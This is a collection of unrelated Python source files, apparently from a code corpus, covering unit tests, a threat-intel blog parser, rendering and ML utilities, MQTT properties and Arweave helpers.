import unittest from unittest import mock import tempfile from shutil import rmtree from os import path, getpid from quikey.directories import AppDirectories from quikey.qkdaemon import ( write_pid, read_pid, delete_pid, ShutdownHook, DatabaseChangeHandler, ) class PidManagementTestCase(unittest.TestCase): def setUp(self): self.data = tempfile.mkdtemp() self.config = tempfile.mkdtemp() self.cache = tempfile.mkdtemp() self.appDirs = AppDirectories(self.data, self.config, self.cache) def tearDown(self): rmtree(self.data) rmtree(self.config) rmtree(self.cache) def testWritePid(self): write_pid(self.appDirs) self.assertTrue(path.exists(path.join(self.appDirs.cache, "quikey.pid"))) def testReadPid(self): write_pid(self.appDirs) p = read_pid(self.appDirs) self.assertIsNotNone(p) self.assertEqual(getpid(), int(p)) def testDeletePid(self): write_pid(self.appDirs) delete_pid(self.appDirs) self.assertFalse(path.exists(path.join(self.appDirs.cache, "quikey.pid"))) class ShutdownHookTestCase(unittest.TestCase): def setUp(self): self.data = tempfile.mkdtemp() self.config = tempfile.mkdtemp() self.cache = tempfile.mkdtemp() self.appDirs = AppDirectories(self.data, self.config, self.cache) write_pid(self.appDirs) def tearDown(self): pass @mock.patch("pynput.keyboard.Listener") @mock.patch("quikey.filewatch.InotifyWatch") def testHookCalled(self, listener, inotify): hook = ShutdownHook(listener, inotify, self.appDirs) hook(0, None) listener.stop.assert_called_with() inotify.stop.assert_called_with() if __name__ == "__main__": unittest.main()
496844
import demistomock as demisto # noqa: F401 from bs4 import BeautifulSoup from CommonServerPython import * # noqa: F401 args = demisto.args() response = requests.get(args.get("url")) soup = BeautifulSoup(response.content, "html.parser") article = soup.find("article").get_text() _, article = article.split("Phishing Email Campaign", 1) article = article.replace('[.]', '.') return_results(CommandResults(readable_output=article, outputs={"http.parsedBlog": article}))
496854
from swmmio.defs.constants import red, purple, lightblue, lightgreen FLOOD_IMPACT_CATEGORIES = { 'increased_flooding': { 'fill': red, }, 'new_flooding': { 'fill': purple, }, 'decreased_flooding': { 'fill': lightblue, }, 'eliminated_flooding': { 'fill': lightgreen, }, }
496865
from mock import patch from django.test import TestCase from django.utils.timezone import now from pycon.bulkemail.models import INPROGRESS, BulkEmail, UNSENT, ERROR, SENT from pycon.bulkemail.tasks import send_bulk_emails, MAX_TIME, RETRY_INTERVAL from pycon.bulkemail.tests.factories import BulkEmailFactory @patch('pycon.bulkemail.models.BulkEmail.send') class BulkEmailSendTaskTest(TestCase): def test_nothing_to_send(self, mock_send): # Should just return send_bulk_emails() self.assertEqual(0, mock_send.call_count) def test_long_inprogress_emails(self, mock_send): # If an email has been INPROGRESS too long, the task # should change it to UNSENT so we can do something # with it. bulk = BulkEmailFactory(status=INPROGRESS, start_time=now() - 2 * MAX_TIME) BulkEmailFactory(status=INPROGRESS, start_time=now()) # Should not retry (yet) send_bulk_emails() self.assertEqual(1, mock_send.call_count) bulk2 = BulkEmail.objects.get(pk=bulk.pk) self.assertEqual(UNSENT, bulk2.status) self.assertEqual(1, mock_send.call_count) def test_retry_error_emails(self, mock_send): # After long enough, retry errored emails BulkEmailFactory(status=ERROR, end_time=now()) # Should not retry (yet) bulk = BulkEmailFactory(status=ERROR, end_time=now() - 2 * RETRY_INTERVAL) send_bulk_emails() self.assertEqual(1, mock_send.call_count) bulk2 = BulkEmail.objects.get(pk=bulk.pk) self.assertEqual(UNSENT, bulk2.status) self.assertEqual(1, mock_send.call_count) def test_call_send(self, mock_send): # Make multiple BulkEmails, but we should only call send on # the one with the UNSENT status. BulkEmailFactory(status=UNSENT) BulkEmailFactory(status=ERROR) BulkEmailFactory(status=SENT) BulkEmailFactory(status=INPROGRESS) send_bulk_emails() self.assertEqual(1, mock_send.call_count) def test_call_exceptions(self, mock_send): # If sending raises exceptions, we still keep going BulkEmailFactory(status=UNSENT) BulkEmailFactory(status=UNSENT) mock_send.side_effect = Exception("Intentional exception during testing") send_bulk_emails() self.assertEqual(2, mock_send.call_count)
496870
import ConfigParser from pylease.logger import LOGME as logme # noqa import os import pylease.cmd import pylease.ext __version__ = '0.3.2' class Pylease(object): """ The main class of Pylease, which contains all the needed resources for extensions. This class is initialised once and by Pylease, which is the so called ``lizy`` object. It is passed to :class:`~pylease.cmd.Command` and :class:`~pylease.ext.Extension` instances. Attributes: info_container (pylease.InfoContainer): Contains information about current status of the project. Minimal information is ``name`` and ``version``. commands (dict): A dictionary of Pylease commands, including commands defined in extensions if any. The values of the dictionary are instances of :class:`~pylease.cmd.Command` class. parser (argparse.ArgumentParser): The root parser of Pylease. Use this object to add command line arguments to Pylease on the same level as ``--version`` and ``--help``. config (dict): A dictionary representing the configuration parsed from ``setup.cfg`` defined under ``[pylease]`` section. If a configuration value in the configuration file is defined as ``key1 = valA, valB, valC`` then the value of the ``key1`` key of this attribute will be an instance of :class:`~list` and be equal to ``['valA', 'valB, 'valC']``. """ def __init__(self, parser, cmd_subparsers, info_container): super(Pylease, self).__init__() self.parser = parser self.cmd_subparsers = cmd_subparsers self.info_container = info_container self.commands = {} config = {} config_parser = ConfigParser.SafeConfigParser() try: if os.path.exists('setup.cfg'): config_parser.read('setup.cfg') items = config_parser.items('pylease') for item in items: config[item[0]] = item[1] except ConfigParser.NoSectionError: logme.warn('No pylease section found in setup.cfg') self.config = config self._load_extensions() def add_command(self, name, command): self.commands[name] = command def execute_command(self, name, args): return self.commands[name](args) def add_subparser(self, *args, **kwargs): return self.cmd_subparsers.add_parser(*args, **kwargs) def _get_config_list_value(self, key): values = None if key in self.config: values_str_list = self.config[key].replace(' ', '') values = values_str_list.split(',') return values def get_version_files(self): return self._get_config_list_value('version-files') def get_plugins(self): return self._get_config_list_value('use-plugins') or [] def _load_extensions(self): extension_packages = self.get_plugins() for package in extension_packages: __import__(package) class InfoContainer(object): # pylint: disable=too-few-public-methods """ A simple container that maps a provided dictionary to its attributes. This provides the current status of the project, and the minimal built-in information attributes are the following: Attributes: name (str): The name of the project. version (str): The current versin of the project is_empty (bool): The status of current working directory, i.e. indicates whether it is empty or not. """ def __init__(self): super(InfoContainer, self).__init__() self.name = None self.version = None self.is_empty = False def set_info(self, **kwargs): """ Used to extend the information about the project. Example: Below are two options on how to use/extend the ``InfoContainer``:: info = InfoContainer() # Option 1 info.set_info(info1='value2', info2='value2') # Option 2 more_info = {'info3': 'value3'} info.set_info(**more_info) # Then you can access your info as instance attributes print(info.info2) # will print 'value2' """ for key in kwargs: setattr(self, key, kwargs[key])
496917
import hashlib from Crypto.Signature import PKCS1_PSS from Crypto.Hash import SHA256 from jose import jwk from jose.utils import base64url_encode, base64url_decode, base64 def create_tag(name, value, v2): if v2: b64name = name b64value = value else: b64name = base64url_encode(name.encode('ascii')).decode() b64value = base64url_encode(value.encode('ascii')).decode() return {"name": b64name, "value": b64value} def encode_tag(tag): b64name = base64url_encode(tag['name'].encode('ascii')).decode() b64value = base64url_encode(tag['value'].encode('ascii')).decode() return {"name": b64name, "value": b64value} def decode_tag(tag): name = base64url_decode(tag['name'].encode()) value = base64url_decode(tag['value'].encode()) return {'name': name, 'value': value} def owner_to_address(owner): result = base64url_encode(hashlib.sha256(base64url_decode(owner.encode('ascii'))).digest()).decode() return result def winston_to_ar(winston_str: str) -> float: length = len(winston_str) if length > 12: past_twelve = length - 12 winston_str = "{}.{}".format(winston_str[0:past_twelve], winston_str[-12:]) else: lessthan_twelve = 12 - length winston_str = "0.{}{}".format("0" * lessthan_twelve, winston_str) return float(winston_str) def ar_to_winston(ar_amount: str) -> str: return str(int(float(ar_amount) * 10**12)) def concat_buffers(buffers): total_length = 0 for buffer in buffers: total_length += len(buffer) offset = 0 temp = b'\x00' * total_length temp = bytearray(temp) for buffer in buffers: for i in range(len(buffer)): temp[i + offset] = buffer[i] offset += len(buffer) return bytes(temp)
496961
import mock from twindb_backup.share import share @mock.patch('twindb_backup.share.print') # @mock.patch('twindb_backup.share.get_destination') def test_share_backup_cli(mock_print): mock_config = mock.Mock() mock_config.get.return_value = "/foo/bar" mock_dst = mock.Mock() mock_dst.remote_path = '/foo/bar' mock_config.destination.return_value = mock_dst mock_dst.find_files.return_value = ["/foo/bar1", "/foo/bar"] share(mock_config, "/foo/bar") mock_print.assert_called_once() mock_dst.share.assert_called_once_with("/foo/bar") mock_config.destination.assert_called_once_with()
496973
import os from dlocr.densenet.core import DenseNetOCR from dlocr.densenet.data_loader import load_dict default_densenet_weight_path = os.path.join(os.getcwd(), os.path.dirname(__file__), "../weights/weights-densent-init.hdf5") default_densenet_config_path = os.path.join(os.getcwd(), os.path.dirname(__file__), "../config/densent-default.json") default_dict_path = os.path.join(os.getcwd(), os.path.dirname(__file__), "../dictionary/char_std_5990.txt") __densenet = None def get_or_create(densenet_config_path=default_densenet_config_path, densenet_weight_path=default_densenet_weight_path): global __densenet if __densenet is None: config = DenseNetOCR.load_config(densenet_config_path) __densenet = DenseNetOCR(**config, weight_path=densenet_weight_path) return __densenet
496974
import factory from factory.fuzzy import FuzzyText from fjord.feedback.tests import ProductFactory from fjord.suggest.providers.trigger.models import TriggerRule class TriggerRuleFactory(factory.DjangoModelFactory): class Meta: model = TriggerRule slug = FuzzyText() title = 'OU812' description = 'Oh, you ate one, too?' url = 'https://wiki.mozilla.org/Firefox/Input' is_enabled = True @factory.post_generation def products(self, create, extracted, **kwargs): if not create: return if extracted: for product in extracted: self.products.add(product)
496980
import pytest # noqa import requests import json import gevent from eth_utils import is_same_address from microraiden.constants import API_PATH from microraiden.proxy.paywalled_proxy import PaywalledProxy def test_resources(doggo_proxy, api_endpoint_address, users_db): auth_credentials = ('<PASSWORD>', 'password') users_db.add_user(auth_credentials[0], auth_credentials[1]) users_db.token_expiry_seconds = 0.5 api_path = "http://" + api_endpoint_address + API_PATH # without auth, refuse access rv = requests.get(api_path + "/admin") assert rv.status_code == 401 # bad login rv = requests.get(api_path + "/login", auth=('user', '<PASSWORD>')) assert rv.status_code == 401 # good login, we got the token rv = requests.get(api_path + "/login", auth=auth_credentials) assert rv.status_code == 200 json_response = json.loads(rv.text) assert 'token' in json_response token_credentials = (json_response['token'], '') # use the token to login rv = requests.get(api_path + "/admin", auth=token_credentials) assert rv.status_code == 200 # logout with an invalid token rv = requests.get(api_path + "/logout", auth=('invalid_token', '')) assert rv.status_code == 401 # logout with a valid token rv = requests.get(api_path + "/logout", auth=token_credentials) assert rv.status_code == 200 # after logout, refuse access rv = requests.get(api_path + "/admin", auth=token_credentials) assert rv.status_code == 401 # TODO: test token expiration. we must set token expiry timeout somehow # login again rv = requests.get(api_path + "/login", auth=auth_credentials) assert rv.status_code == 200 json_response = json.loads(rv.text) assert 'token' in json_response token_credentials = (json_response['token'], '') gevent.sleep(1) # use the token to login rv = requests.get(api_path + "/admin", auth=token_credentials) assert rv.status_code == 401 def test_stats(doggo_proxy: PaywalledProxy, api_endpoint_address): api_path = "http://" + api_endpoint_address + API_PATH rv = requests.get(api_path + "/stats") assert rv.status_code == 200 stats = json.loads(rv.text) assert 'balance_sum' in stats assert 'deposit_sum' in stats assert 'token_address' in stats assert 'receiver_address' in stats assert 'contract_address' in stats assert stats['sync_block'] == doggo_proxy.channel_manager.blockchain.sync_start_block assert is_same_address(stats['receiver_address'], doggo_proxy.channel_manager.receiver) token_address = doggo_proxy.channel_manager.token_contract.address assert is_same_address(stats['token_address'], token_address) contract_address = doggo_proxy.channel_manager.channel_manager_contract.address assert is_same_address(stats['contract_address'], contract_address)
497000
import pyredner import numpy as np import torch # From the test_single_triangle.py test case but with viewport pyredner.set_use_gpu(torch.cuda.is_available()) cam = pyredner.Camera(position = torch.tensor([0.0, 0.0, -5.0]), look_at = torch.tensor([0.0, 0.0, 0.0]), up = torch.tensor([0.0, 1.0, 0.0]), fov = torch.tensor([45.0]), # in degree clip_near = 1e-2, # needs to > 0 resolution = (1024, 1024), viewport = (200, 300, 700, 800)) mat_grey = pyredner.Material(\ diffuse_reflectance = \ torch.tensor([0.5, 0.5, 0.5], device = pyredner.get_device())) materials = [mat_grey] shape_triangle = pyredner.Shape(\ vertices = torch.tensor([[-1.7, 1.0, 0.0], [1.0, 1.0, 0.0], [-0.5, -1.0, 0.0]], device = pyredner.get_device()), indices = torch.tensor([[0, 1, 2]], dtype = torch.int32, device = pyredner.get_device()), uvs = None, normals = None, material_id = 0) shape_light = pyredner.Shape(\ vertices = torch.tensor([[-1.0, -1.0, -7.0], [ 1.0, -1.0, -7.0], [-1.0, 1.0, -7.0], [ 1.0, 1.0, -7.0]], device = pyredner.get_device()), indices = torch.tensor([[0, 1, 2],[1, 3, 2]], dtype = torch.int32, device = pyredner.get_device()), uvs = None, normals = None, material_id = 0) shapes = [shape_triangle, shape_light] light = pyredner.AreaLight(shape_id = 1, intensity = torch.tensor([20.0,20.0,20.0])) area_lights = [light] scene = pyredner.Scene(cam, shapes, materials, area_lights) scene_args = pyredner.RenderFunction.serialize_scene(\ scene = scene, num_samples = 16, max_bounces = 1) render = pyredner.RenderFunction.apply img = render(0, *scene_args) pyredner.imwrite(img.cpu(), 'results/test_viewport/target.exr') pyredner.imwrite(img.cpu(), 'results/test_viewport/target.png') target = pyredner.imread('results/test_viewport/target.exr') if pyredner.get_use_gpu(): target = target.cuda(device = pyredner.get_device()) # Perturb the scene, this is our initial guess. shape_triangle.vertices = torch.tensor(\ [[-2.0,1.5,0.3], [0.9,1.2,-0.3], [-0.4,-1.4,0.2]], device = pyredner.get_device(), requires_grad = True) # Set requires_grad to True since we want to optimize this scene_args = pyredner.RenderFunction.serialize_scene(\ scene = scene, num_samples = 16, max_bounces = 1) img = render(1, *scene_args) pyredner.imwrite(img.cpu(), 'results/test_single_triangle/init.png') diff = torch.abs(target - img) pyredner.imwrite(diff.cpu(), 'results/test_single_triangle/init_diff.png') optimizer = torch.optim.Adam([shape_triangle.vertices], lr=5e-2) for t in range(200): print('iteration:', t) optimizer.zero_grad() scene_args = pyredner.RenderFunction.serialize_scene(\ scene = scene, num_samples = 4, # We use less samples in the Adam loop. max_bounces = 1) img = render(t+1, *scene_args) pyredner.imwrite(img.cpu(), 'results/test_viewport/iter_{}.png'.format(t)) loss = (img - target).pow(2).sum() print('loss:', loss.item()) loss.backward() print('grad:', shape_triangle.vertices.grad) optimizer.step() print('vertices:', shape_triangle.vertices) scene_args = pyredner.RenderFunction.serialize_scene(\ scene = scene, num_samples = 16, max_bounces = 1) img = render(202, *scene_args) pyredner.imwrite(img.cpu(), 'results/test_viewport/final.exr') pyredner.imwrite(img.cpu(), 'results/test_viewport/final.png') pyredner.imwrite(torch.abs(target - img).cpu(), 'results/test_viewport/final_diff.png') from subprocess import call call(["ffmpeg", "-framerate", "24", "-i", "results/test_viewport/iter_%d.png", "-vb", "20M", "results/test_viewport/out.mp4"])
497003
import torch from .base_sampler import BaseSampler class SelectiveIoUSampler(BaseSampler): def __init__(self, **kwargs): pass def _sample_pos(self, **kwargs): raise NotImplementedError def _sample_neg(self, **kwargs): raise NotImplementedError def sample(self, assign_result, bboxes, gt_bboxes, **kwargs): pos_inds = torch.nonzero( assign_result.gt_inds > 0).squeeze(-1).unique() neg_inds = torch.nonzero( assign_result.gt_inds == 0).squeeze(-1).unique() confuse_inds = torch.nonzero(assign_result.gt_inds == -2).squeeze(-1).unique() gt_flags = bboxes.new_zeros(bboxes.shape[0], dtype=torch.uint8) sampling_result = SamplingResult(pos_inds, neg_inds, confuse_inds, bboxes, gt_bboxes, assign_result, gt_flags) return sampling_result class SamplingResult(object): def __init__(self, pos_inds, neg_inds, confuse_inds, bboxes, gt_bboxes, assign_result, gt_flags): self.pos_inds = pos_inds self.neg_inds = neg_inds self.confuse_inds = confuse_inds self.pos_bboxes = bboxes[pos_inds] self.neg_bboxes = bboxes[neg_inds] self.confuse_bboxes = bboxes[confuse_inds] self.pos_is_gt = gt_flags[pos_inds] self.num_gts = gt_bboxes.shape[0] self.pos_assigned_gt_inds = assign_result.gt_inds[pos_inds] - 1 self.pos_gt_bboxes = gt_bboxes[self.pos_assigned_gt_inds, :] if assign_result.labels is not None: self.pos_gt_labels = assign_result.labels[pos_inds] else: self.pos_gt_labels = None @property def bboxes(self): return torch.cat([self.pos_bboxes, self.neg_bboxes, self.confuse_bboxes])
497019
from jsonpath_rw import parse def get_cjson_energy(cjson): energy = parse('properties.totalEnergy').find(cjson) if energy: return energy[0].value return None
497042
import uasyncio as asyncio from homie.constants import STRING, T_SET, TRUE, FALSE from homie.validator import payload_is_valid class BaseProperty: def __init__( self, id, name=None, settable=False, retained=True, unit=None, datatype=STRING, format=None, default=None, restore=True, on_message=None, pub_on_upd=True, ): self._value = default self.id = id self.name = name self.settable = settable self.retained = retained self.unit = unit self.datatype = datatype self.format = format self.restore = restore self.on_message = on_message self.pub_on_upd = pub_on_upd self.topic = None self.node = None # Keep for backward compatibility @property def data(self): return self._value # Keep for backward compatibility @data.setter def data(self, value): self.value = value @property def value(self): return self._value @value.setter def value(self, value): """Assign new value if changed or self.pub_on_upd is True and publish to mqtt""" if value != self._value: self._value = value self.publish() elif self.pub_on_upd: self.publish() def set_topic(self): self.topic = "{}/{}/{}".format( self.node.device.dtopic, self.node.id, self.id ) def publish(self): if self._value is None: return asyncio.create_task( self.node.device.publish( self.topic, self.value, self.retained ) ) async def subscribe(self): # Restore from topic with retained message on device start if self.restore and self.node.device.first_start is True: self.node.device.callback_topics[self.topic] = self.restore_handler await self.node.device.subscribe(self.topic) # Subscribe to settable (/set) topics if self.settable is True: topic = "{}/set".format(self.topic) self.node.device.callback_topics[topic] = self.message_handler await self.node.device.subscribe(topic) def restore_handler(self, topic, payload, retained): """ Gets called when the property should be restored from mqtt """ # Retained messages are not allowed on /set topics if topic.endswith(T_SET): return # Unsubscribe from topic and remove the callback handler asyncio.create_task(self.node.device.unsubscribe(topic)) del self.node.device.callback_topics[topic] if payload_is_valid(self, payload): if payload != self._value: if self.on_message: self.on_message(topic, payload, retained) self._value = payload def message_handler(self, topic, payload, retained): """ Gets called when the property receive a message on /set topic """ # No reatained messages allowed on /set topics if retained: return if payload_is_valid(self, payload): if self.on_message: self.on_message(topic, payload, retained) self.value = payload async def publish_properties(self): topic = self.topic publish = self.node.device.publish await publish("{}/$name".format(topic), self.name) await publish("{}/$datatype".format(topic), self.datatype) if self.format is not None: await publish("{}/$format".format(topic), self.format) if self.settable is True: await publish("{}/$settable".format(topic), TRUE) if self.retained is False: await publish("{}/$retained".format(topic), FALSE) if self.unit is not None: await publish("{}/$unit".format(topic), self.unit) HomieProperty = BaseProperty # Keep for backward compatibility HomieNodeProperty = BaseProperty
497075
import numpy import scipy.stats import math def one_hot(array, N): """ Convert an array of numbers to an array of one-hot vectors. :param array: classes to convert :type array: numpy.ndarray :param N: number of classes :type N: int :return: one-hot vectors :rtype: numpy.ndarray """ array = array.astype(int) assert numpy.max(array) < N assert numpy.min(array) >= 0 one_hot = numpy.zeros((array.shape[0], N)) one_hot[numpy.arange(array.shape[0]), array] = 1 return one_hot def expand_as(array, array_as): """ Expands the tensor using view to allow broadcasting. :param array: input tensor :type array: numpy.ndarray :param array_as: reference tensor :type array_as: torch.Tensor or torch.autograd.Variable :return: tensor expanded with singelton dimensions as tensor_as :rtype: torch.Tensor or torch.autograd.Variable """ shape = list(array.shape) for i in range(len(array.shape), len(array_as.shape)): shape.append(1) return array.reshape(shape) def concatenate(array1, array2, axis=0): """ Basically a wrapper for numpy.concatenate, with the exception that the array itself is returned if its None or evaluates to False. :param array1: input array or None :type array1: mixed :param array2: input array :type array2: numpy.ndarray :param axis: axis to concatenate :type axis: int :return: concatenated array :rtype: numpy.ndarray """ assert isinstance(array2, numpy.ndarray) if array1 is not None: assert isinstance(array1, numpy.ndarray) return numpy.concatenate((array1, array2), axis=axis) else: return array2 def exponential_norm(batch_size, dim, epsilon=1, ord=2): """ Sample vectors uniformly by norm and direction separately. :param batch_size: how many vectors to sample :type batch_size: int :param dim: dimensionality of vectors :type dim: int :param epsilon: epsilon-ball :type epsilon: float :param ord: norm to use :type ord: int :return: batch_size x dim tensor :rtype: numpy.ndarray """ random = numpy.random.randn(batch_size, dim) random /= numpy.repeat(numpy.linalg.norm(random, ord=ord, axis=1).reshape(-1, 1), axis=1, repeats=dim) random *= epsilon truncated_normal = scipy.stats.truncexpon.rvs(1, loc=0, scale=0.9, size=(batch_size, 1)) random *= numpy.repeat(truncated_normal, axis=1, repeats=dim) return random def uniform_norm(batch_size, dim, epsilon=1, ord=2): """ Sample vectors uniformly by norm and direction separately. :param batch_size: how many vectors to sample :type batch_size: int :param dim: dimensionality of vectors :type dim: int :param epsilon: epsilon-ball :type epsilon: float :param ord: norm to use :type ord: int :return: batch_size x dim tensor :rtype: numpy.ndarray """ random = numpy.random.randn(batch_size, dim) random /= numpy.repeat(numpy.linalg.norm(random, ord=ord, axis=1).reshape(-1, 1), axis=1, repeats=dim) random *= epsilon uniform = numpy.random.uniform(0, 1, (batch_size, 1)) # exponent is only difference! random *= numpy.repeat(uniform, axis=1, repeats=dim) return random def uniform_ball(batch_size, dim, epsilon=1, ord=2): """ Sample vectors uniformly in the n-ball. See Harman et al., On decompositional algorithms for uniform sampling from n-spheres and n-balls. :param batch_size: how many vectors to sample :type batch_size: int :param dim: dimensionality of vectors :type dim: int :param epsilon: epsilon-ball :type epsilon: float :param ord: norm to use :type ord: int :return: batch_size x dim tensor :rtype: numpy.ndarray """ random = numpy.random.randn(batch_size, dim) random /= numpy.repeat(numpy.linalg.norm(random, ord=ord, axis=1).reshape(-1, 1), axis=1, repeats=dim) random *= epsilon uniform = numpy.random.uniform(0, 1, (batch_size, 1)) ** (1. / dim) random *= numpy.repeat(uniform, axis=1, repeats=dim) return random def uniform_sphere(batch_size, dim, epsilon=1, ord=2): """ Sample vectors uniformly on the n-sphere. See Harman et al., On decompositional algorithms for uniform sampling from n-spheres and n-balls. :param batch_size: how many vectors to sample :type batch_size: int :param dim: dimensionality of vectors :type dim: int :param epsilon: epsilon-ball :type epsilon: float :param ord: norm to use :type ord: int :return: batch_size x dim tensor :rtype: numpy.ndarray """ random = numpy.random.randn(batch_size, dim) random /= numpy.repeat(numpy.linalg.norm(random, ord=ord, axis=1).reshape(-1, 1), axis=1, repeats=dim) random *= epsilon return random def truncated_normal(size, lower=-2, upper=2): """ Sample from truncated normal. See https://stackoverflow.com/questions/18441779/how-to-specify-upper-and-lower-limits-when-using-numpy-random-normal. :param size: size of vector :type size: [int] :param lower: lower bound :type lower: float :param upper: upper bound :type upper: float :return: batch_size x dim tensor :rtype: numpy.ndarray """ return scipy.stats.truncnorm.rvs(lower, upper, size=size) def project_simplex(v, s=1): """ Taken from https://gist.github.com/daien/1272551/edd95a6154106f8e28209a1c7964623ef8397246. Compute the Euclidean projection on a positive simplex Solves the optimisation problem (using the algorithm from [1]): min_w 0.5 * || w - v ||_2^2 , s.t. \sum_i w_i = s, w_i >= 0 Parameters ---------- v: (n,) numpy array, n-dimensional vector to project s: int, optional, default: 1, radius of the simplex Returns ------- w: (n,) numpy array, Euclidean projection of v on the simplex Notes ----- The complexity of this algorithm is in O(n log(n)) as it involves sorting v. Better alternatives exist for high-dimensional sparse vectors (cf. [1]) However, this implementation still easily scales to millions of dimensions. References ---------- [1] Efficient Projections onto the .1-Ball for Learning in High Dimensions <NAME>, <NAME>, <NAME>, and <NAME>. International Conference on Machine Learning (ICML 2008) http://www.cs.berkeley.edu/~jduchi/projects/DuchiSiShCh08.pdf """ assert s > 0, "Radius s must be strictly positive (%d <= 0)" % s n, = v.shape # will raise ValueError if v is not 1-D # check if we are already on the simplex if v.sum() == s and numpy.alltrue(v >= 0): # best projection: itself! return v # get the array of cumulative sums of a sorted (decreasing) copy of v u = numpy.sort(v)[::-1] cssv = numpy.cumsum(u) # get the number of > 0 components of the optimal solution rho = numpy.nonzero(u * numpy.arange(1, n+1) > (cssv - s))[0][-1] # compute the Lagrange multiplier associated to the simplex constraint theta = float(cssv[rho] - s) / rho # compute the projection by thresholding v using theta w = (v - theta).clip(min=0) return w def projection_simplex_sort(v, z=1): n_features = v.shape[0] u = numpy.sort(v)[::-1] cssv = numpy.cumsum(u) - z ind = numpy.arange(n_features) + 1 cond = u - cssv / ind > 0 rho = ind[cond][-1] theta = cssv[cond][-1] / float(rho) w = numpy.maximum(v - theta, 0) return w def projection_simplex_pivot(v, z=1, random_state=None): rs = numpy.random.RandomState(random_state) n_features = len(v) U = numpy.arange(n_features) s = 0 rho = 0 while len(U) > 0: G = [] L = [] k = U[rs.randint(0, len(U))] ds = v[k] for j in U: if v[j] >= v[k]: if j != k: ds += v[j] G.append(j) elif v[j] < v[k]: L.append(j) drho = len(G) + 1 if s + ds - (rho + drho) * v[k] < z: s += ds rho += drho U = L else: U = G theta = (s - z) / float(rho) return numpy.maximum(v - theta, 0) def projection_simplex_bisection(v, z=1, tau=0.0001, max_iter=1000): lower = 0 upper = numpy.max(v) current = numpy.inf for it in xrange(max_iter): if numpy.abs(current) / z < tau and current < 0: break theta = (upper + lower) / 2.0 w = numpy.maximum(v - theta, 0) current = numpy.sum(w) - z if current <= 0: upper = theta else: lower = theta return w def project_ball(array, epsilon=1, ord=2): """ Compute the orthogonal projection of the input tensor (as vector) onto the L_ord epsilon-ball. **Assumes the first dimension to be batch dimension, which is preserved.** :param array: array :type array: numpy.ndarray :param epsilon: radius of ball. :type epsilon: float :param ord: order of norm :type ord: int :return: projected vector :rtype: torch.autograd.Variable or torch.Tensor """ assert isinstance(array, numpy.ndarray), 'given tensor should be numpy.ndarray' if ord == 0: assert epsilon >= 1 size = array.shape flattened_size = numpy.prod(numpy.array(size[1:])) array = array.reshape(-1, flattened_size) sorted = numpy.sort(array, axis=1) k = int(math.ceil(epsilon)) thresholds = sorted[:, -k] mask = (array >= expand_as(thresholds, array)).astype(float) array *= mask elif ord == 1: size = array.shape flattened_size = numpy.prod(numpy.array(size[1:])) array = array.reshape(-1, flattened_size) for i in range(array.shape[0]): # compute the vector of absolute values u = numpy.abs(array[i]) # check if v is already a solution if u.sum() <= epsilon: # L1-norm is <= s continue # v is not already a solution: optimum lies on the boundary (norm == s) # project *u* on the simplex #w = project_simplex(u, s=epsilon) w = projection_simplex_sort(u, z=epsilon) # compute the solution to the original problem on v w *= numpy.sign(array[i]) array[i] = w if len(size) == 4: array = array.reshape(-1, size[1], size[2], size[3]) elif len(size) == 2: array = array.reshape(-1, size[1]) elif ord == 2: size = array.shape flattened_size = numpy.prod(numpy.array(size[1:])) array = array.reshape(-1, flattened_size) clamped = numpy.clip(epsilon/numpy.linalg.norm(array, 2, axis=1), a_min=None, a_max=1) clamped = clamped.reshape(-1, 1) array = array * clamped if len(size) == 4: array = array.reshape(-1, size[1], size[2], size[3]) elif len(size) == 2: array = array.reshape(-1, size[1]) elif ord == float('inf'): array = numpy.clip(array, a_min=-epsilon, a_max=epsilon) else: raise NotImplementedError() return array def project_sphere(array, epsilon=1, ord=2): """ Compute the orthogonal projection of the input tensor (as vector) onto the L_ord epsilon-ball. **Assumes the first dimension to be batch dimension, which is preserved.** :param array: variable or tensor :type array: torch.autograd.Variable or torch.Tensor :param epsilon: radius of ball. :type epsilon: float :param ord: order of norm :type ord: int :return: projected vector :rtype: torch.autograd.Variable or torch.Tensor """ assert isinstance(array, numpy.ndarray), 'given tensor should be numpy.ndarray' size = array.shape flattened_size = numpy.prod(numpy.array(size[1:])) array = array.reshape(-1, flattened_size) array = array/numpy.linalg.norm(array, axis=1, ord=ord).reshape(-1, 1) array *= epsilon if len(size) == 4: array = array.reshape(-1, size[1], size[2], size[3]) elif len(size) == 2: array = array.reshape(-1, size[1]) return array def project_orthogonal(basis, vectors, rank=None): """ Project the given vectors on the basis using an orthogonal projection. :param basis: basis vectors to project on :type basis: numpy.ndarray :param vectors: vectors to project :type vectors: numpy.ndarray :return: projection :rtype: numpy.ndarray """ # The columns of Q are an orthonormal basis of the columns of basis Q, R = numpy.linalg.qr(basis) if rank is not None and rank > 0: Q = Q[:, :rank] # As Q is orthogonal, the projection is beta = Q.T.dot(vectors) projection = Q.dot(beta) return projection def project_lstsq(basis, vectors): """ Project using least squares. :param basis: basis vectors to project on :type basis: numpy.ndarray :param vectors: vectors to project :type vectors: numpy.ndarray :return: projection :rtype: numpy.ndarray """ x, _, _, _ = numpy.linalg.lstsq(basis, vectors) projection = basis.dot(x) return projection def angles(vectors_a, vectors_b): """ Compute angle between two sets of vectors. See https://people.eecs.berkeley.edu/~wkahan/Mindless.pdf. :param vectors_a: :param vectors_b: :return: """ if len(vectors_b.shape) == 1: vectors_b = vectors_b.reshape(-1, 1) # Normalize vector norms_a = numpy.linalg.norm(vectors_a, ord=2, axis=0) norms_b = numpy.linalg.norm(vectors_b, ord=2, axis=0) norms_a = numpy.repeat(norms_a.reshape(1, -1), vectors_a.shape[0], axis=0) norms_b = numpy.repeat(norms_b.reshape(1, -1), vectors_b.shape[0], axis=0) vectors_a /= norms_a vectors_b /= norms_b term_1 = numpy.multiply(vectors_a, norms_b) - numpy.multiply(vectors_b, norms_a) term_1 = numpy.linalg.norm(term_1, ord=2, axis=0) term_2 = numpy.multiply(vectors_a, norms_b) + numpy.multiply(vectors_b, norms_a) term_2 = numpy.linalg.norm(term_2, ord=2, axis=0) angles = 2*numpy.arctan2(term_1, term_2) return angles def normalized_non_maximum_entropy_detector(probabilities): indices = numpy.argmax(probabilities, axis=1) normalized_probabilities = numpy.copy(probabilities) normalized_probabilities[numpy.arange(probabilities.shape[0]), indices] = 0 normalized_probabilities = normalized_probabilities/numpy.sum(normalized_probabilities, axis=1).reshape(-1, 1) from scipy.special import xlogy confidences = - numpy.sum(xlogy(normalized_probabilities, normalized_probabilities), axis=1) #confidences /= math.log(probabilities.shape[1]) return confidences def max_detector(probabilities): return numpy.max(probabilities, axis=1)
497077
